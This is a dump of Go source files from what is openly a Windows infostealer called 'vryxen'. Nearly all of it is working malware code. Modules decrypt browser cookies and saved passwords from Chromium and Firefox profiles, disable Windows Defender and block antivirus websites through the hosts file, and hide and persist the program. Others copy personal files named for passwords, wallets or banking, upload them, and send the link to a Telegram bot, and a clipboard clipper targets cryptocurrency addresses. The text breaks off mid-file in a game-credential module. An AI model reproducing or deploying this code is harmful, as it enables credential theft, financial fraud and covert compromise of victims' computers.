75 | err = k.DeleteValue("DelegateExecute") 76 | if err != nil { 77 | return err 78 | } 79 | 80 | return nil 81 | } 82 | 83 | func Run() { 84 | if common.IsElevated() { 85 | return 86 | } 87 | 88 | if !CanElevate() { 89 | return 90 | } 91 | 92 | if err := Elevate(); err != nil { 93 | return 94 | } 95 | 96 | os.Exit(0) 97 | } -------------------------------------------------------------------------------- /cmd/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "github.com/unf6/vryxen/internal/antidebug" 5 | "github.com/unf6/vryxen/internal/antivm" 6 | "github.com/unf6/vryxen/internal/antivirus" 7 | "github.com/unf6/vryxen/internal/fakerr" 8 | "github.com/unf6/vryxen/internal/hc" 9 | "github.com/unf6/vryxen/pkg/utils/startup" 10 | "github.com/unf6/vryxen/internal/uac" 11 | "github.com/unf6/vryxen/pkg/utils/common" 12 | "github.com/unf6/vryxen/pkg/utils/processkill" 13 | "github.com/unf6/vryxen/internal/fr" 14 | "github.com/unf6/vryxen/internal/taskmanager" 15 | 16 | 17 | 18 | "github.com/unf6/vryxen/internal/core/socials" 19 | "github.com/unf6/vryxen/internal/core/cryptowallets" 20 | "github.com/unf6/vryxen/internal/core/ftps" 21 | "github.com/unf6/vryxen/internal/core/games" 22 | "github.com/unf6/vryxen/internal/core/system" 23 | "github.com/unf6/vryxen/internal/core/browsers" 24 | "github.com/unf6/vryxen/internal/core/clipper" 25 | "github.com/unf6/vryxen/internal/core/commonfiles" 26 | "github.com/unf6/vryxen/internal/core/vpn" 27 | ) 28 | 29 | func main() { 30 | CONFIG := map[string]interface{}{ 31 | "botToken": "", 32 | "chatId": "", 33 | "cryptos": map[string]string{ 34 | "BTC": "", 35 | "BCH": "", 36 | "ETH": "", 37 | "XMR": "", 38 | "LTC": "", 39 | "XCH": "", 40 | "XLM": "", 41 | "TRX": "", 42 | "ADA": "", 43 | "DASH": "", 44 | "DOGE": "", 45 | }, 46 | } 47 | 48 | if common.IsAlreadyRunning() { 49 | return 50 | } 51 | 52 | Uac.Run() 53 | processkill.Run() 54 | 55 | HideConsole.Hide() 56 | common.HideSelf() 57 | FactoryReset.Disable() 58 | TaskManager.Disable() 59 | 60 | 61 | if !common.IsInStartupPath() { 62 | go FakeError.Show() 63 | go startup.Run() 64 | } 65 | 66 | AntiVMAnalysis.Check() 67 | go antidebug.Run() 68 | go antivirus.Run() 69 | 70 | actions := []func(string, string){ 71 | system.Run, 72 | browsers.Run, 73 | commonfiles.Run, 74 | wallets.Run, 75 | games.Run, 76 | ftps.Run, 77 | vpn.Run, 78 | Socials.Run, 79 | } 80 | 81 | for _, action := range actions { 82 | go action(CONFIG["botToken"].(string), CONFIG["chatId"].(string)) 83 | } 84 | 85 | clipper.Run(CONFIG["cryptos"].(map[string]string)) 86 | } 87 | -------------------------------------------------------------------------------- /internal/core/browsers/cookies.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | import ( 4 | "path/filepath" 5 | 6 | _ "modernc.org/sqlite" 7 | ) 8 | 9 | func (c *Chromium) GetCookies(path string) (cookies []Cookie, err error) { 10 | db, err := GetDBConnection(filepath.Join(path, "Network", "Cookies")) 11 | if err != nil { 12 | return nil, err 13 | } 14 | 15 | rows, err := db.Query("SELECT name, encrypted_value, host_key, path, expires_utc FROM cookies") 16 | if err != nil { 17 | return nil, err 18 | } 19 | defer rows.Close() 20 | 21 | for rows.Next() { 22 | var ( 23 | name, host, path string 24 | encryptedValue, value []byte 25 | expiresUtc int64 26 | ) 27 | if err = rows.Scan(&name, &encryptedValue, &host, &path, &expiresUtc); err != nil { 28 | continue 29 | } 30 | 31 | if name == "" || host == "" || path == "" || encryptedValue == nil { 32 | continue 33 | } 34 | 35 | cookie := Cookie{ 36 | Name: name, 37 | Host: host, 38 | Path: path, 39 | ExpireDate: expiresUtc, 40 | } 41 | 42 | value, err = c.Decrypt(encryptedValue) 43 | if err != nil { 44 | continue 45 | } 46 | cookie.Value = string(value) 47 | cookies = append(cookies, cookie) 48 | } 49 | 50 | return cookies, nil 51 | } 52 | 53 | func (g *Gecko) GetCookies(path string) (cookies []Cookie, err error) { 54 | db, err := GetDBConnection(filepath.Join(path, "cookies.sqlite")) 55 | if err != nil { 56 | return nil, err 57 | } 58 | 59 | rows, err := db.Query("SELECT name, value, host, path, expiry FROM moz_cookies") 60 | if err != nil { 61 | return nil, err 62 | } 63 | 64 | defer rows.Close() 65 | 66 | for rows.Next() { 67 | var ( 68 | name, host, path string 69 | value []byte 70 | expiry int64 71 | ) 72 | if err = rows.Scan(&name, &value, &host, &path, &expiry); err != nil { 73 | continue 74 | } 75 | 76 | if name == "" || host == "" || path == "" || value == nil { 77 | continue 78 | } 79 | 80 | cookie := Cookie{ 81 | Name: name, 82 | Host: host, 83 | Path: path, 84 | ExpireDate: expiry, 85 | Value: string(value), 86 | } 87 | cookies = append(cookies, cookie) 88 | } 89 | 90 | return cookies, nil 91 | } -------------------------------------------------------------------------------- /internal/core/browsers/masterkey.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | import ( 4 | "bytes" 5 | "encoding/base64" 6 | "encoding/json" 7 | "errors" 8 | "os" 9 | "path/filepath" 10 | _ "modernc.org/sqlite" 11 | ) 12 | 13 | func ReadFile(path string) (string, error) { 14 | bytes, err := os.ReadFile(path) 15 | if err != nil { 16 | return "", err 17 | } 18 | return string(bytes), nil 19 | } 20 | 21 | 22 | func (c *Chromium) GetMasterKey(path string) error { 23 | b, err := ReadFile(filepath.Join(path, "Local State")) 24 | if err != nil { 25 | return err 26 | } 27 | defer os.Remove("masterkey_db") 28 | 29 | var data struct { 30 | OsCrypt struct { 31 | EncryptedKey string `json:"encrypted_key"` 32 | } `json:"os_crypt"` 33 | } 34 | err = json.Unmarshal([]byte(b), &data) 35 | if err != nil { 36 | return err 37 | } 38 | 39 | key, err := base64.StdEncoding.DecodeString(data.OsCrypt.EncryptedKey) 40 | if err != nil { 41 | return err 42 | } 43 | 44 | c.MasterKey, err = DPAPI(key[5:]) 45 | if err != nil { 46 | return err 47 | } 48 | 49 | return nil 50 | } 51 | 52 | func (g *Gecko) GetMasterKey(path string) error { 53 | var globalSalt, metaBytes, nssA11, nssA102, key []byte 54 | 55 | keyDB, err := GetDBConnection(filepath.Join(path, "key4.db")) 56 | 57 | if err != nil { 58 | return err 59 | } 60 | 61 | if err = keyDB.QueryRow(`SELECT item1, item2 FROM metaData WHERE id = 'password'`).Scan(&globalSalt, &metaBytes); err != nil { 62 | return err 63 | } 64 | 65 | if err = keyDB.QueryRow(`SELECT a11, a102 from nssPrivate`).Scan(&nssA11, &nssA102); err != nil { 66 | return err 67 | } 68 | 69 | metaPBE, err := NewASN1PBE(metaBytes) 70 | if err != nil { 71 | return err 72 | } 73 | 74 | k, err := metaPBE.Decrypt(globalSalt, key) 75 | if err != nil { 76 | return err 77 | } 78 | 79 | if !bytes.Contains(k, []byte("password-check")) { 80 | return errors.New("password check error") 81 | } 82 | 83 | if !bytes.Equal(nssA102, []byte{248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1}) { 84 | return errors.New("nssA102 error") 85 | } 86 | 87 | nssPBE, err := NewASN1PBE(nssA11) 88 | if err != nil { 89 | return err 90 | } 91 | 92 | finallyKey, err := nssPBE.Decrypt(globalSalt, key) 93 | if err != nil { 94 | return err 95 | } 96 | 97 | g.MasterKey = finallyKey[:24] 98 | return nil 99 | } -------------------------------------------------------------------------------- /internal/core/browsers/logins.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | import ( 4 | "encoding/base64" 5 | "encoding/json" 6 | "os" 7 | 8 | "path/filepath" 9 | 10 | _ "modernc.org/sqlite" 11 | ) 12 | 13 | func (c *Chromium) GetLogins(path string) (logins []Login, err error) { 14 | db, err := GetDBConnection(filepath.Join(path, "Login Data")) 15 | if err != nil { 16 | return nil, err 17 | } 18 | 19 | rows, err := db.Query("SELECT action_url, username_value, password_value, date_created FROM logins") 20 | if err != nil { 21 | return nil, err 22 | } 23 | defer rows.Close() 24 | 25 | for rows.Next() { 26 | var ( 27 | url, username string 28 | pwd, password []byte 29 | create int64 30 | ) 31 | if err := rows.Scan(&url, &username, &pwd, &create); err != nil { 32 | continue 33 | } 34 | if url == "" || username == "" || pwd == nil { 35 | continue 36 | } 37 | 38 | login := Login{ 39 | Username: username, 40 | LoginURL: url, 41 | } 42 | 43 | password, err = c.Decrypt(pwd) 44 | if err != nil { 45 | continue 46 | } 47 | 48 | login.Password = string(password) 49 | logins = append(logins, login) 50 | } 51 | 52 | return logins, nil 53 | } 54 | 55 | func (g *Gecko) GetLogins(path string) (logins []Login, err error) { 56 | s, err := os.ReadFile(path + "\\logins.json") 57 | if err != nil { 58 | return nil, err 59 | } 60 | 61 | var data struct { 62 | NextId int `json:"nextId"` 63 | Logins []struct { 64 | Hostname string `json:"hostname"` 65 | EncryptedUsername string `json:"encryptedUsername"` 66 | EncryptedPassword string `json:"encryptedPassword"` 67 | } 68 | } 69 | if err = json.Unmarshal(s, &data); err != nil { 70 | return nil, err 71 | } 72 | 73 | for _, v := range data.Logins { 74 | decodedUser, err := base64.StdEncoding.DecodeString(v.EncryptedUsername) 75 | if err != nil { 76 | return nil, err 77 | } 78 | decodedPass, err := base64.StdEncoding.DecodeString(v.EncryptedPassword) 79 | if err != nil { 80 | return nil, err 81 | } 82 | decryptedUser, err := g.Decrypt(decodedUser) 83 | if err != nil { 84 | return nil, err 85 | } 86 | decryptedPass, err := g.Decrypt(decodedPass) 87 | if err != nil { 88 | return nil, err 89 | } 90 | 91 | logins = append(logins, Login{ 92 | Username: string(decryptedUser), 93 | Password: string(decryptedPass), 94 | LoginURL: v.Hostname, 95 | }) 96 | } 97 | 98 | return logins, nil 99 | } -------------------------------------------------------------------------------- /pkg/utils/common/common.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | import ( 4 | "bytes" 5 | "fmt" 6 | "math/rand" 7 | "net" 8 | "os" 9 | "os/exec" 10 | "path/filepath" 11 | "strings" 12 | "syscall" 13 | 14 | "github.com/shirou/gopsutil/v3/disk" 15 | "golang.org/x/sys/windows" 16 | ) 17 | 18 | func IsElevated() bool { 19 | ret, _, _ := syscall.NewLazyDLL("shell32.dll").NewProc("IsUserAnAdmin").Call() 20 | return ret != 0 21 | } 22 | 23 | func IsInStartupPath() bool { 24 | exePath, err := os.Executable() 25 | if err != nil { 26 | return false 27 | } 28 | exePath = filepath.Dir(exePath) 29 | 30 | if exePath == "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" { 31 | return true 32 | } 33 | 34 | if exePath == filepath.Join(os.Getenv("APPDATA"), "Microsoft", "Protect") { 35 | return true 36 | } 37 | 38 | return false 39 | } 40 | 41 | func HideSelf() { 42 | exe, err := os.Executable() 43 | if err != nil { 44 | return 45 | } 46 | 47 | cmd := exec.Command("attrib", "+h", "+s", exe) 48 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 49 | 50 | cmd.Run() 51 | } 52 | 53 | func IsAlreadyRunning() bool { 54 | const AppID = "3575651c-bb47-448e-a514-22865732bbc" 55 | 56 | _, err := windows.CreateMutex(nil, false, syscall.StringToUTF16Ptr(fmt.Sprintf("Global\\%s", AppID))) 57 | return err != nil 58 | } 59 | 60 | func GetUsers() []string { 61 | if IsElevated() { 62 | return []string{os.Getenv("USERPROFILE")} 63 | } 64 | 65 | var users []string 66 | drives, err := disk.Partitions(false) 67 | if err != nil { 68 | return []string{os.Getenv("USERPROFILE")} 69 | } 70 | 71 | for _, drive := range drives { 72 | mountpoint := drive.Mountpoint 73 | 74 | files, err := os.ReadDir(fmt.Sprintf("%s//Users", mountpoint)) 75 | if err != nil { 76 | continue 77 | } 78 | 79 | for _, file := range files { 80 | if !file.IsDir() { 81 | continue 82 | } 83 | users = append(users, filepath.Join(fmt.Sprintf("%s//Users", mountpoint), file.Name())) 84 | } 85 | } 86 | 87 | return users 88 | } 89 | 90 | func RandString(n int) string { 91 | var letters = []rune("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") 92 | b := make([]rune, n) 93 | for i := range b { 94 | b[i] = letters[rand.Intn(len(letters))] 95 | } 96 | return string(b) 97 | } 98 | 99 | func GetHWID() (string, error) { 100 | cmd := exec.Command("wmic", "csproduct", "get", "UUID") 101 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 102 | 103 | out, err := cmd.Output() 104 | if err != nil { 105 | return "", err 106 | } 107 | 108 | return strings.TrimSpace(strings.Split(string(out), "\n")[1]), nil 109 | } 110 | 111 | func GetMAC() (string, error) { 112 | interfaces, err := net.Interfaces() 113 | if err != nil { 114 | return "", err 115 | } 116 | 117 | for _, i := range interfaces { 118 | if i.Flags&net.FlagUp != 0 && !bytes.Equal(i.HardwareAddr, nil) { 119 | return i.HardwareAddr.String(), nil 120 | } 121 | } 122 | 123 | return "", fmt.Errorf("no MAC address found") 124 | } 125 | -------------------------------------------------------------------------------- /internal/core/browsers/paths.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | func GetChromiumBrowsers() map[string]string { 4 | return map[string]string{ 5 | "Chromium": "AppData\\Local\\Chromium\\User Data", 6 | "Thorium": "AppData\\Local\\Thorium\\User Data", 7 | "Chrome": "AppData\\Local\\Google\\Chrome\\User Data", 8 | "Chrome (x86)": "AppData\\Local\\Google(x86)\\Chrome\\User Data", 9 | "Chrome SxS": "AppData\\Local\\Google\\Chrome SxS\\User Data", 10 | "Maple": "AppData\\Local\\MapleStudio\\ChromePlus\\User Data", 11 | "Iridium": "AppData\\Local\\Iridium\\User Data", 12 | "7Star": "AppData\\Local\\7Star\\7Star\\User Data", 13 | "CentBrowser": "AppData\\Local\\CentBrowser\\User Data", 14 | "Chedot": "AppData\\Local\\Chedot\\User Data", 15 | "Vivaldi": "AppData\\Local\\Vivaldi\\User Data", 16 | "Kometa": "AppData\\Local\\Kometa\\User Data", 17 | "Elements": "AppData\\Local\\Elements Browser\\User Data", 18 | "Epic Privacy Browser": "AppData\\Local\\Epic Privacy Browser\\User Data", 19 | "Uran": "AppData\\Local\\uCozMedia\\Uran\\User Data", 20 | "Fenrir": "AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", 21 | "Catalina": "AppData\\Local\\CatalinaGroup\\Citrio\\User Data", 22 | "Coowon": "AppData\\Local\\Coowon\\Coowon\\User Data", 23 | "Liebao": "AppData\\Local\\liebao\\User Data", 24 | "QIP Surf": "AppData\\Local\\QIP Surf\\User Data", 25 | "Orbitum": "AppData\\Local\\Orbitum\\User Data", 26 | "Dragon": "AppData\\Local\\Comodo\\Dragon\\User Data", 27 | "360Browser": "AppData\\Local\\360Browser\\Browser\\User Data", 28 | "Maxthon": "AppData\\Local\\Maxthon3\\User Data", 29 | "K-Melon": "AppData\\Local\\K-Melon\\User Data", 30 | "CocCoc": "AppData\\Local\\CocCoc\\Browser\\User Data", 31 | "Brave": "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", 32 | "Amigo": "AppData\\Local\\Amigo\\User Data", 33 | "Torch": "AppData\\Local\\Torch\\User Data", 34 | "Sputnik": "AppData\\Local\\Sputnik\\Sputnik\\User Data", 35 | "Edge": "AppData\\Local\\Microsoft\\Edge\\User Data", 36 | "DCBrowser": "AppData\\Local\\DCBrowser\\User Data", 37 | "Yandex": "AppData\\Local\\Yandex\\YandexBrowser\\User Data", 38 | "UR Browser": "AppData\\Local\\UR Browser\\User Data", 39 | "Slimjet": "AppData\\Local\\Slimjet\\User Data", 40 | "Opera": "AppData\\Roaming\\Opera Software\\Opera Stable", 41 | "OperaGX": "AppData\\Roaming\\Opera Software\\Opera GX Stable", 42 | } 43 | } 44 | 45 | func GetGeckoBrowsers() map[string]string { 46 | return map[string]string{ 47 | "Firefox": "AppData\\Roaming\\Mozilla\\Firefox\\Profiles", 48 | "SeaMonkey": "AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles", 49 | "Waterfox": "AppData\\Roaming\\Waterfox\\Profiles", 50 | "K-Meleon": "AppData\\Roaming\\K-Meleon\\Profiles", 51 | "Thunderbird": "AppData\\Roaming\\Thunderbird\\Profiles", 52 | "IceDragon": "AppData\\Roaming\\Comodo\\IceDragon\\Profiles", 53 | "Cyberfox": "AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles", 54 | "BlackHaw": "AppData\\Roaming\\NETGATE Technologies\\BlackHaw\\Profiles", 55 | "Pale Moon": "AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles", 56 | "Mercury": "AppData\\Roaming\\mercury\\Profiles", 57 | } 58 | } -------------------------------------------------------------------------------- /pkg/utils/requests/requests.go: -------------------------------------------------------------------------------- 1 | package requests 2 | 3 | import ( 4 | "bytes" 5 | "fmt" 6 | "io" 7 | "mime/multipart" 8 | "net/http" 9 | "net/url" 10 | "os" 11 | "path/filepath" 12 | "time" 13 | ) 14 | 15 | const ( 16 | DefaultTimeout = 30 * time.Second 17 | ) 18 | 19 | // SendTelegramMessage sends a text message to a Telegram chat. 20 | func Send2TelegramMessage(botToken, chatID, message string) error { 21 | apiURL := fmt.Sprintf("https://api.telegram.org/bot%s/sendMessage", botToken) 22 | 23 | // Prepare the request payload 24 | data := url.Values{} 25 | data.Set("chat_id", chatID) 26 | data.Set("text", message) 27 | 28 | // Send the POST request 29 | resp, err := http.PostForm(apiURL, data) 30 | if err != nil { 31 | return err 32 | } 33 | defer resp.Body.Close() 34 | 35 | if resp.StatusCode != http.StatusOK { 36 | responseBody, _ := io.ReadAll(resp.Body) 37 | fmt.Printf("Telegram API request failed with status %d: %s\n", resp.StatusCode, string(responseBody)) 38 | return fmt.Errorf("failed to send message: %s", string(responseBody)) 39 | } 40 | 41 | return nil 42 | } 43 | 44 | // SendTelegramDocument sends a document to a Telegram chat. 45 | func Send2TelegramDocument(botToken, chatID, filePath string) error { 46 | fmt.Println("Sending document to Telegram:", filePath) 47 | apiBaseURL := "https://api.telegram.org/bot" 48 | client := &http.Client{} 49 | body := &bytes.Buffer{} 50 | writer := multipart.NewWriter(body) 51 | 52 | // Always add chat_id 53 | writer.WriteField("chat_id", chatID) 54 | 55 | // Add file if provided 56 | if filePath != "" { 57 | file, err := os.Open(filePath) 58 | if err != nil { 59 | return err 60 | } 61 | defer file.Close() 62 | 63 | part, err := writer.CreateFormFile("document", filepath.Base(filePath)) 64 | if err != nil { 65 | return err 66 | } 67 | 68 | if _, err = io.Copy(part, file); err != nil { 69 | return err 70 | } 71 | } 72 | 73 | writer.Close() 74 | 75 | apiMethod := "sendDocument" 76 | apiURL := fmt.Sprintf("%s%s/%s", apiBaseURL, botToken, apiMethod) 77 | req, err := http.NewRequest("POST", apiURL, body) 78 | 79 | if err != nil { 80 | return err 81 | } 82 | 83 | req.Header.Set("Content-Type", writer.FormDataContentType()) 84 | 85 | resp, err := client.Do(req) 86 | if err != nil { 87 | return err 88 | } 89 | defer resp.Body.Close() 90 | 91 | if resp.StatusCode != http.StatusOK { 92 | responseBody, _ := io.ReadAll(resp.Body) 93 | fmt.Printf("Telegram API request failed with status %d: %s\n", resp.StatusCode, string(responseBody)) 94 | return fmt.Errorf("failed to send document: %s", string(responseBody)) 95 | } 96 | 97 | return nil 98 | } 99 | 100 | func Get(url string, headers ...map[string]string) ([]byte, error) { 101 | req, err := http.NewRequest(http.MethodGet, url, nil) 102 | if err != nil { 103 | return nil, fmt.Errorf("failed to create request: %w", err) 104 | } 105 | 106 | if len(headers) > 0 { 107 | for key, value := range headers[0] { 108 | req.Header.Set(key, value) 109 | } 110 | } 111 | 112 | client := &http.Client{ 113 | Timeout: DefaultTimeout, 114 | } 115 | 116 | resp, err := client.Do(req) 117 | if err != nil { 118 | return nil, fmt.Errorf("failed to execute request: %w", err) 119 | } 120 | defer resp.Body.Close() 121 | 122 | if resp.StatusCode < 200 || resp.StatusCode >= 300 { 123 | return nil, fmt.Errorf("unexpected status code: %d", resp.StatusCode) 124 | } 125 | 126 | res, err := io.ReadAll(resp.Body) 127 | if err != nil { 128 | return nil, fmt.Errorf("failed to read response body: %w", err) 129 | } 130 | 131 | return res, nil 132 | } -------------------------------------------------------------------------------- /internal/antivirus/antivirus.go: -------------------------------------------------------------------------------- 1 | package antivirus 2 | 3 | import ( 4 | "os" 5 | "os/exec" 6 | "path/filepath" 7 | "errors" 8 | "fmt" 9 | "syscall" 10 | "strings" 11 | "github.com/unf6/vryxen/pkg/utils/common" 12 | 13 | ) 14 | 15 | 16 | func Run() { 17 | 18 | sites := []string{ 19 | "virustotal.com", 20 | "avast.com", 21 | "totalav.com", 22 | "scanguard.com", 23 | "totaladblock.com", 24 | "pcprotect.com", 25 | "mcafee.com", 26 | "bitdefender.com", 27 | "us.norton.com", 28 | "avg.com", 29 | "malwarebytes.com", 30 | "pandasecurity.com", 31 | "avira.com", 32 | "norton.com", 33 | "eset.com", 34 | "zillya.com", 35 | "kaspersky.com", 36 | "usa.kaspersky.com", 37 | "sophos.com", 38 | "home.sophos.com", 39 | "adaware.com", 40 | "bullguard.com", 41 | "clamav.net", 42 | "drweb.com", 43 | "emsisoft.com", 44 | "f-secure.com", 45 | "zonealarm.com", 46 | "trendmicro.com", 47 | "ccleaner.com", 48 | } 49 | 50 | ExcludeFromDefender() 51 | DisableDefender() 52 | BlockSites(sites) 53 | 54 | } 55 | 56 | func ExcludeFromDefender() error { 57 | if !common.IsElevated() { 58 | return errors.New("not elevated") 59 | } 60 | path, err := os.Executable() 61 | if err != nil { 62 | return err 63 | } 64 | 65 | cmd := exec.Command("powershell", "-Command", "Add-MpPreference", "-ExclusionPath", path) 66 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 67 | return cmd.Run() 68 | } 69 | 70 | func DisableDefender() error { 71 | if !common.IsElevated() { 72 | return errors.New("not elevated") 73 | } 74 | 75 | cmd := exec.Command("powershell", "Set-MpPreference", "-DisableIntrusionPreventionSystem", "$true", "-DisableIOAVProtection", "$true", "-DisableRealtimeMonitoring", "$true", "-DisableScriptScanning", "$true", "-EnableControlledFolderAccess", "Disabled", "-EnableNetworkProtection", "AuditMode", "-Force", "-MAPSReporting", "Disabled", "-SubmitSamplesConsent", "NeverSend") 76 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 77 | 78 | _, err := cmd.Output() 79 | if err != nil { 80 | return err 81 | } 82 | 83 | cmd = exec.Command("powershell", "Set-MpPreference", "-SubmitSamplesConsent", "2") 84 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 85 | 86 | _, err = cmd.Output() 87 | if err != nil { 88 | return err 89 | } 90 | 91 | cmd = exec.Command("cmd", "/c", fmt.Sprintf("%s\\Windows Defender\\MpCmdRun.exe", os.Getenv("ProgramFiles")), "-RemoveDefinitions", "-All") 92 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 93 | 94 | return cmd.Run() 95 | } 96 | 97 | func BlockSites(sites []string) error { 98 | if !common.IsElevated() { 99 | return errors.New("not elevated") 100 | } 101 | 102 | hostFilePath := filepath.Join(os.Getenv("systemroot"), "System32\\drivers\\etc\\hosts") 103 | 104 | data, err := os.ReadFile(hostFilePath) 105 | if err != nil { 106 | return err 107 | } 108 | 109 | var newData []string 110 | for _, line := range strings.Split(string(data), "\n") { 111 | for _, bannedSite := range sites { 112 | if strings.Contains(line, bannedSite) { 113 | continue 114 | } 115 | } 116 | newData = append(newData, line) 117 | } 118 | 119 | for _, bannedSite := range sites { 120 | newData = append(newData, "0.0.0.0 "+bannedSite) 121 | newData = append(newData, "0.0.0.0 www."+bannedSite) 122 | } 123 | 124 | d := strings.Join(newData, "\n") 125 | d = strings.ReplaceAll(d, "\n\n", "\n") 126 | 127 | cmd := exec.Command("attrib", "-r", hostFilePath) 128 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 129 | 130 | if err = cmd.Run(); err != nil { 131 | return err 132 | } 133 | if err = os.WriteFile(hostFilePath, []byte(d), 0644); err != nil { 134 | return err 135 | } 136 | 137 | cmd = exec.Command("attrib", "+r", hostFilePath) 138 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 139 | 140 | return cmd.Run() 141 | } 142 | -------------------------------------------------------------------------------- /internal/core/commonfiles/commonfiles.go: -------------------------------------------------------------------------------- 1 | package commonfiles 2 | 3 | import ( 4 | "github.com/unf6/vryxen/pkg/utils/common" 5 | "github.com/unf6/vryxen/pkg/utils/requests" 6 | "github.com/unf6/vryxen/pkg/utils/fileutil" 7 | "fmt" 8 | "log" 9 | "os" 10 | "path/filepath" 11 | "strings" 12 | 13 | "github.com/KasimKaizer/gofileioupload" 14 | ) 15 | 16 | func Run(botToken string, chatID string) { 17 | tempDir := filepath.Join(os.TempDir(), "commonfiles-temp") 18 | os.MkdirAll(tempDir, os.ModePerm) 19 | defer os.RemoveAll(tempDir) 20 | 21 | extensions := []string{ 22 | ".txt", 23 | ".log", 24 | ".doc", 25 | ".docx", 26 | ".xls", 27 | ".xlsx", 28 | ".ppt", 29 | ".pptx", 30 | ".odt", 31 | ".pdf", 32 | ".rtf", 33 | ".json", 34 | ".csv", 35 | ".db", 36 | ".jpg", 37 | ".jpeg", 38 | ".png", 39 | ".gif", 40 | ".webp", 41 | ".mp4", 42 | } 43 | keywords := []string{ 44 | "account", 45 | "password", 46 | "secret", 47 | "mdp", 48 | "motdepass", 49 | "mot_de_pass", 50 | "login", 51 | "paypal", 52 | "banque", 53 | "seed", 54 | "banque", 55 | "bancaire", 56 | "bank", 57 | "metamask", 58 | "wallet", 59 | "crypto", 60 | "exodus", 61 | "atomic", 62 | "auth", 63 | "mfa", 64 | "2fa", 65 | "code", 66 | "memo", 67 | "compte", 68 | "token", 69 | "password", 70 | "credit", 71 | "card", 72 | "mail", 73 | "address", 74 | "phone", 75 | "permis", 76 | "number", 77 | "backup", 78 | "database", 79 | "config", 80 | } 81 | 82 | found := 0 83 | for _, user := range common.GetUsers() { 84 | for _, dir := range []string{ 85 | filepath.Join(user, "Desktop"), 86 | filepath.Join(user, "Downloads"), 87 | filepath.Join(user, "Documents"), 88 | filepath.Join(user, "Videos"), 89 | filepath.Join(user, "Pictures"), 90 | filepath.Join(user, "Music"), 91 | filepath.Join(user, "OneDrive"), 92 | } { 93 | if _, err := os.Stat(dir); err != nil { 94 | continue 95 | } 96 | filepath.Walk(dir, func(path string, info os.FileInfo, err error) error { 97 | if err != nil { 98 | return nil 99 | } 100 | 101 | if info.IsDir() { 102 | return nil 103 | } 104 | 105 | if info.Size() > 2*1024*1024 { 106 | return nil 107 | } 108 | for _, keyword := range keywords { 109 | if !strings.Contains(strings.ToLower(info.Name()), keyword) { 110 | continue 111 | } 112 | for _, extension := range extensions { 113 | if !strings.HasSuffix(strings.ToLower(info.Name()), extension) { 114 | continue 115 | } 116 | dest := filepath.Join(tempDir, strings.Split(user, "\\")[2], info.Name()) 117 | if fileutil.Exists(dest) { 118 | dest = filepath.Join(tempDir, strings.Split(user, "\\")[2], fmt.Sprintf("%s_%s", info.Name(), common.RandString(4))) 119 | } 120 | os.MkdirAll(filepath.Join(tempDir, strings.Split(user, "\\")[2]), os.ModePerm) 121 | 122 | err := fileutil.CopyFile(path, dest) 123 | if err != nil { 124 | continue 125 | } 126 | break 127 | } 128 | found++ 129 | break 130 | } 131 | return nil 132 | }) 133 | } 134 | } 135 | 136 | if found == 0 { 137 | return 138 | } 139 | 140 | tempZip := filepath.Join(os.TempDir(), "commonfiles.zip") 141 | password := common.RandString(16) 142 | fileutil.ZipWithPassword(tempDir, tempZip, password) 143 | defer os.Remove(tempZip) 144 | 145 | client := gofileioupload.NewClient() 146 | 147 | // Get the best server 148 | server, err := client.BestServer() 149 | if err != nil { 150 | log.Fatalf("Failed to get best server: %v", err) 151 | } 152 | fileData, err := client.UploadFile(tempZip, server) 153 | if err != nil { 154 | log.Fatalf("Failed to upload file: %v", err) 155 | } 156 | 157 | fmt.Printf("File uploaded successfully!\nDownload Page: %s\n", fileData.DownloadPage) 158 | 159 | message := "Link: \n" + fileData.DownloadPage + "\nPassword: \n" + password 160 | 161 | requests := requests.Send2TelegramMessage(botToken, chatID, message) 162 | if requests != nil { 163 | log.Fatalln(requests) 164 | } 165 | 166 | } 167 | -------------------------------------------------------------------------------- /internal/core/games/games.go: -------------------------------------------------------------------------------- 1 | package games 2 | 3 | import ( 4 | "fmt" 5 | "github.com/unf6/vryxen/pkg/utils/fileutil" 6 | "github.com/unf6/vryxen/pkg/utils/requests" 7 | "github.com/unf6/vryxen/pkg/utils/common" 8 | "os" 9 | "path/filepath" 10 | "strings" 11 | ) 12 | 13 | func Run(botToken, chatId string) { 14 | for _, user := range common.GetUsers() { 15 | paths := map[string]map[string]string{ 16 | "Epic Games": { 17 | "Settings": filepath.Join(user, "AppData", "Local", "EpicGamesLauncher", "Saved", "Config", "Windows", "GameUserSettings.ini"), 18 | }, 19 | "Minecraft": { 20 | "Intent": filepath.Join(user, "intentlauncher", "launcherconfig"), 21 | "Lunar": filepath.Join(user, ".lunarclient", "settings", "game", "accounts.json"), 22 | "TLauncher": filepath.Join(user, "AppData", "Roaming", ".minecraft", "TlauncherProfiles.json"), 23 | "Feather": filepath.Join(user, "AppData", "Roaming", ".feather", "accounts.json"), 24 | "Meteor": filepath.Join(user, "AppData", "Roaming", ".minecraft", "meteor-client", "accounts.nbt"), 25 | "Impact": filepath.Join(user, "AppData", "Roaming", ".minecraft", "Impact", "alts.json"), 26 | "Novoline": filepath.Join(user, "AppData", "Roaming", ".minecraft", "Novoline", "alts.novo"), 27 | "CheatBreakers": filepath.Join(user, "AppData", "Roaming", ".minecraft", 